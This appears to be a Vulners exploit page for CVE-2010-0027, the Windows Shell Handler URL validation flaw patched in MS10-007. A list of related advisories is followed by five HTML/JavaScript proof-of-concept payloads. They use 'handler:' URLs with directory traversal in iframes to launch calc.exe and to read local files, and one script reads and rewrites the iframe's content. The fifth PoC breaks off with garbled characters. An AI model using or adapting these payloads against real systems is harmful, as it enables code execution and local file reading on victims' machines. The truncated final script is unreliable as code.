| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| CVE-2010-0027 | 21 Jan 201000:00 | – | circl | |
| Microsoft Windows Shell Handler URL Validation Code Execution (MS10-007; CVE-2010-0027) | 9 Feb 201000:00 | – | checkpoint_advisories | |
| CVE-2010-0027 | 22 Jan 201021:20 | – | cve | |
| CVE-2010-0027 | 22 Jan 201021:20 | – | cvelist | |
| MS10-002: Cumulative security update for Internet Explorer | 23 Jun 201407:27 | – | mskb | |
| CVE-2010-0027 | 22 Jan 201022:00 | – | nvd | |
| Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713) | 10 Feb 201000:00 | – | openvas | |
| Microsoft Internet Explorer Multiple Vulnerabilities (978207) | 22 Jan 201000:00 | – | openvas | |
| Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713) | 10 Feb 201000:00 | – | openvas | |
| Microsoft Internet Explorer Multiple Vulnerabilities (978207) | 22 Jan 201000:00 | – | openvas |
############# PoC one #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe"></html>
################# EOF #################
############## PoC Two #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt"></html>
############# EOF #################
############# PoC Three ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>
############### EOF ###########
############# PoC four ##############
<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert('content: ' + content);
content = 'change iframe content';
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>
<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>
</body>
</html>
##################### EOF #############################
########### PoC Five ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(??GET??,
??handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms??,
true);
req.send(?
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation